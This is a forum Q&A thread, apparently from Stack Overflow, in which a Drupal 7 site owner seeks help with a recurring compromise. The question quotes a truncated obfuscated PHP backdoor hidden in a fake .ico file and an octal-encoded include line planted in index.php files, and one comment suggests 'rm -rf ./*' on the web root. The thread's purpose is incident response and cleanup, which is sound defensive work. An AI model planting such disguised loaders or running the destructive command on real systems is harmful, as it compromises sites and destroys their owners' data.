How to clean up hacked Drupal site

1
votes

My drupal 7 site has been recently compromised - I guess due to unpatched critical issue (I had two minor versions oldere than latest) but I can't make it clean again.

What's happening:

From time to time (probably triggered by access some page) site gets into the internal error wher root URL show something like (sorry - I forgot to record that this time) "PHP errror, expected ) but , found in .... there is some path to .ico file"

That ico file contains just some PHP code. and is located on different places, usually it has name like .fsdr4ef.ico and is located at random places places like modues/file

Example content:

pk/(/vz8rq/trim/mvo0/(/v/preg_replace/m6yf/(/qp/rawurldecode/s8/(/13rz/"%2F%5C%28.%2A%24%2F"/es/)/ctyo/, '', FILE/st8j1/)/htzf3//p6i25/)/k1vd//k5/)/dh0/;$6famu = "G%00%17K%12%07%03S%0A%40%0C%07G%09%15C%11V%02%0Bj%00A%07%17%0AV%12h%00A%06%07A%06%0ENJF%24%1D%3D%07V%05%0F%5B%06%06N%10%1B%5C%03V%0El%00%09%5B%17K%11%170M%14R%02G%06F%12O%0EXJT%24l%17GY%0E%16D%10%0ETCV%1EQ%00X%13%05%13%5B%00Z%00%0C%01%0E%14F%04C%06%0DEK%0A%13%0B%1FG%10%1BC%17%0C%0AA%14%40%1D%0C%1EZOLG%40%04%0C%5E%0E%5D%08CR%0EA%10X%13%05%09GK%0A%00%5E%15F%13%0A%13_FF%17%5C%05%06%01%06BM%0BC%0A%10%1CX%0EM%0AD%05OLG%40%04%0C%5E%0E%5D%08CA%13F%5E%10%40%06%12%1DGA%05%17%18%40%12X%12G8BO%0B%5E%00%154%0A%0Fj%3E%1ACY%15GA%05%17%18%40%12X%12G8BO%0B%5E%00%154%0A%0Fj%3E%13YF%11%19F%19%0A%19uB%5E%3E%08%1El%11%1BO%18%05%05M%09U%0E%0EA%14T%14%5B%1B%0FM%0EH%17AW%06%05Z%07KKX%1DK%12B%11%5DCBM%02_%0F%09%0CA%04ZK%17%10%01_%08C%1A%02F%15%1B%3DGR%14%13%40%1BX%1E%0A%16%5BF%0AC%14FRgF%1A_F%5B%7CC%03U%16%06R%02%20%196%02%2A_C%609%1646p%0AG%28%0A0%60%27uFd3Cb%1A%0B%3EWVA%3FnFd%15C%40%29%0B%5D1J%1AP%12%06%07DH%3FD%19%2AT0O%23FFd9Cb3%60%2

and it's much longer.

This ico include is being called by randomly generated index.php files placed also within different dirs (and code is also in main index.php in root folder)

/55b79/

@include "\057d\141t\141/\167e\142/\166i\162t\165a\154s\0571\0670\0676\070/\166i\162t\165a\154/\167w\167/\155o\144u\154e\163/\146i\154e\057.\1467\1433\143f\065c\056i\143o";

/55b79/

What I did so far:

I changed my FTP password
Deleted everything by sites/ folde
Uploaded a lates Drupal 7 version
Searched and deleted all index.php files and suspicious .ico files
Changed Drupal admin password
Updated all modules and removed unsused ones

All seemed to be working fine but after few days the same issue - I really don't know how it can be happening? I searched even within the all .php file to find out where those index.php can be created or so but haven't found anything.

Thanks for any help.

TC

1
phpdrupal-7code-cleanup
If your site is hacked, you HAVE to figure out how it is hacked, or just flush the entire server. For instance, if you have a leaky PHP script, which allowed code injection, the infection still can't reach further than the rights the PHP user has in the system, and so just flushing your web folder might be sufficient. But if you don't know, other parts of the server may be hacked, and any attempt to undo it may just be overruled again. You can change the locks, but if the burglar is still inside, it won't help.. - GolezTrol
Hi, it's normal commercial hosting - as I said - I changed all passwords and deleted all fake accounts I found in Drupal user database. So now there is somewhere some code remains as I used the latest Drupal version. But can't find the "source" of that. - Tomáš Cigánek
You need to redo everything. You can't be sure something wasn't modified to create a backdoor serverfault.com/questions/218005/…. - user3783243
Happened to one my the sites I support recently. The hosting company restored the site from backup to fix the problem. You may want to see if your hosting company will do the same thing for you. - Dave
You're talking about drupal 7 here. Who knows what out of date modules (let alone the core) you're using. It's possible the exploit is in the clean version as well and the contributors just ceased support. It's conceivable your site is permanently vulnerable unless you trace down the vulnerability yourself and patch it. Otherwise, I suggest ssh into web root and rm -rf ./* and never use drupal again... and in case you're not a ssh user, that will delete your whole site. - Kai Qing

1 Answers

2
votes

This is a encoded path

@include "\057d\141t\141/\167e\142/\166i\162t\165a\154s\0571\0670\0676\070/\166i\162t\165a\154/\167w\167/\155o\144u\154e\163/\146i\154e\057.\1467\1433\143f\065c\056i\143o";

which decodes to (decode from here)

@include "/data/web/virtuals/170768/virtual/www/modules/file/.f7c3cf5c.ico"

This is a backdoor disguised as an icon file. Delete this file and delete all the malicious index.php files. Also there might be some files with random names such as rkhqjezh.php. Delete them too. Also look into your existing php files. Some malicious code might be injected in beginning of those files too. Remove it. It is a tedious process but eventually you will be able to delete each of these files. Once you are done with this you might want to change your ftp passwords. Also look at your mysql logs to see if there is any possible sql injection.